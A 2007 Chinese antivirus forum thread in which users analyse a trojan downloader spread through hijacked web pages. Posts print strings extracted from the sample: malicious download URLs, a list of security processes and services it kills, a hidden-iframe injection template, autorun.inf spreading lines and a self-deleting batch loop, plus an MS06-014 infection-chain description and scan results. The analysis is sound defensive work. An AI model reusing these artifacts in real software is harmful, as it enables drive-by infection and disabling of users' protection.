查看: 5494|回复: 40
收起左侧

[病毒样本] 费尔发现的一个毒网

[复制链接]
mr_zhj
发表于 2007-3-29 12:41:27 | 显示全部楼层 |阅读模式
gggh
发表于 2007-3-29 12:44:22 | 显示全部楼层
样本呢???
icka
发表于 2007-3-29 13:07:14 | 显示全部楼层
病毒里的部分信息:


  1. [url]http://www.wangzheqiaodan.com/girl/cmd.rar[/url] [url]http://www.wangzheqiaodan.com/girl/picture.htm[/url] e   BLACKSEEDER1.1 \Downloaded Program Files\ %s%.8X.exe kernel32.dll LoadLibraryA advapi32.dll SeDebugPrivilege OpenProcessToken LookupPrivilegeValueA AdjustTokenPrivileges OpenSCManagerA EnumServicesStatusA DeleteService CloseServiceHandle ChangeServiceConfigA ControlService OpenServiceA VirtualAllocEx VirtualFreeEx CreateRemoteThread MSLOGON SOFTWARE\Microsoft\Windows\CurrentVersion\Run BSWNDCLS :try
  2. del "%s"
  3. if exist "%s" goto try
  4. del "%s"
  5. del %%0 open tmp.bat \WININIT.INI Rename NUL mcshield.exe
  6. vstskmgr.exe
  7. naprdmgr.exe
  8. updaterui.exe
  9. tbmon.exe
  10. scan32.exe
  11. ravmond.exe
  12. ccenter.exe
  13. ravtask.exe
  14. rav.exe
  15. ravmon.exe
  16. ravmond.exe
  17. ravstub.exe
  18. kvxp.kxp
  19. kvmonxp.kxp
  20. kvcenter.kxp
  21. kvsrvxp.exe
  22. kregex.exe
  23. uihost.exe
  24. trojdie.kxp
  25. frogagent.exe
  26. 360Safe.exe
  27. AST.exe 网镖 毒霸 瑞星 江民 天网 防火墙 卡巴斯基 超级巡警 安全卫士 木马克星 木马清道夫 symantec antivirus Autoruns winsock expert 进程管理 任务管理 注册表编辑器 系统配置实用程序 木马辅助查找器 VirusScan 超级兔子 优化大师 QQ病毒 iduba esteem procs 绿鹰PC 密码防盗 噬菌体 游戏木马检测大师 wrapped gift killer pjf(ustc)  kavsvc
  28. AVP
  29. AVPkavsvc
  30. McAfeeFramework
  31. McShield
  32. McTaskManager
  33. McAfeeFramework McShield
  34. McTaskManager
  35. navapsvc
  36. KVWSC
  37. KVSrvXP
  38. Schedule
  39. sharedaccess
  40. RsCCenter
  41. RsRavMon
  42. RsCCenter
  43. RsRavMon
  44. wscsvc
  45. KPfwSvc
  46. SNDSrvc
  47. ccProxy
  48. ccEvtMgr
  49. ccSetMgr
  50. SPBBCSvc
  51. Symantec
  52. Core LC
  53. NPFMntor
  54. MskService
  55. FireSvc
  56. Alerter
  57. %s <iframe src=%s width=0 height=0></iframe> \\%s \ GAMECFG.DAT administrator admin  [autorun]
  58. open=%s
  59. shellexecute=%s
  60. shell\auto\command=%s
  61. %s=%d
  62. autorun %c:\%s autorun.inf BSDR1.1 \StringFileInfo\080404B0\CompanyName Microsoft Corporation *.* %c:\ BSDLL Program Files\Internet Explorer\IEXPLORE.EXE exe com scr bat cmd htm html asp aspx php                                                                                                                                                                    
复制代码
dikex
发表于 2007-3-29 13:07:17 | 显示全部楼层
在网页中间用<iframe src=http://www.wangzheqiaodan.com/girl/picture.htm width=0 height=0></iframe>挂上了picture.htm,里面又是一个MS06-014网马(最近暴多!),下载http://www.wangzheqiaodan.com/girl/index.exe到临时文件夹,以IEXPL0RER.EXE命名,生成IEXPL0RER.VBS来执行IEXPL0RER.EXE

而这个IEXPL0RER.EXE(index.exe)是一个下载者,会下载下面的一堆毒!
http://www.wangzheqiaodan.com/girl/cmd.rar
http://www.wangzheqiaodan.com/girl/mm/cs.exe
http://1ll.diy.myrice.com/kb/CSKB0320.EXE
http://www.wangzheqiaodan.com/girl/mm/mh.exe
http://www.wangzheqiaodan.com/girl/mm/my.exe
http://www.wangzheqiaodan.com/girl/mm/wl.exe
http://www.wangzheqiaodan.com/girl/mm/wm.exe
http://www.wangzheqiaodan.com/girl/mm/wow.exe

唉,互连星空也被挂马了,电信实在是不行啊

样本,密码virus

[ 本帖最后由 dikex 于 2007-3-29 13:11 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
mr_zhj
 楼主| 发表于 2007-3-29 13:08:47 | 显示全部楼层

样本

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
icka
发表于 2007-3-29 13:09:16 | 显示全部楼层
看这架势,应该是个熊猫烧香难道?
就是病毒index.exe
1p1
发表于 2007-3-29 13:09:32 | 显示全部楼层
AntiVir  Found TR/Agent.8900  
ArcaVir  Found Heur.Win32  
Avast  Found Win32:Tufik  
AVG Antivirus  Found Generic3.NWM  
BitDefender  Found Generic.Malware.SPBPkg.3A44090B  
ClamAV  Found nothing
Dr.Web  Found nothing
F-Prot Antivirus  Found nothing
F-Secure Anti-Virus  Found nothing
Fortinet  Found nothing
Kaspersky Anti-Virus  Found nothing
NOD32  Found probably unknown NewHeur_PE (probable variant)  
Norman Virus Control  Found nothing
Panda Antivirus  Found Trj/Wow.LF  
Rising Antivirus  Found nothing
VirusBuster  Found Trojan.DL.Tufik.C  
VBA32  Found nothing
所有佛山电信宽带用户均需要登录互联星空佛山专区网站才可享受以下互联星空优惠产品
dikex
发表于 2007-3-29 13:10:41 | 显示全部楼层
原帖由 icka 于 2007-3-29 13:09 发表
看这架势,应该是个熊猫烧香难道?
就是病毒index.exe


index.exe是下载者来的
绅博周幸
发表于 2007-3-29 13:10:57 | 显示全部楼层
都挂马了 强啊
dikex
发表于 2007-3-29 13:11:36 | 显示全部楼层
而且全都是MS06-014网马
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-4-26 17:55 , Processed in 0.133972 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表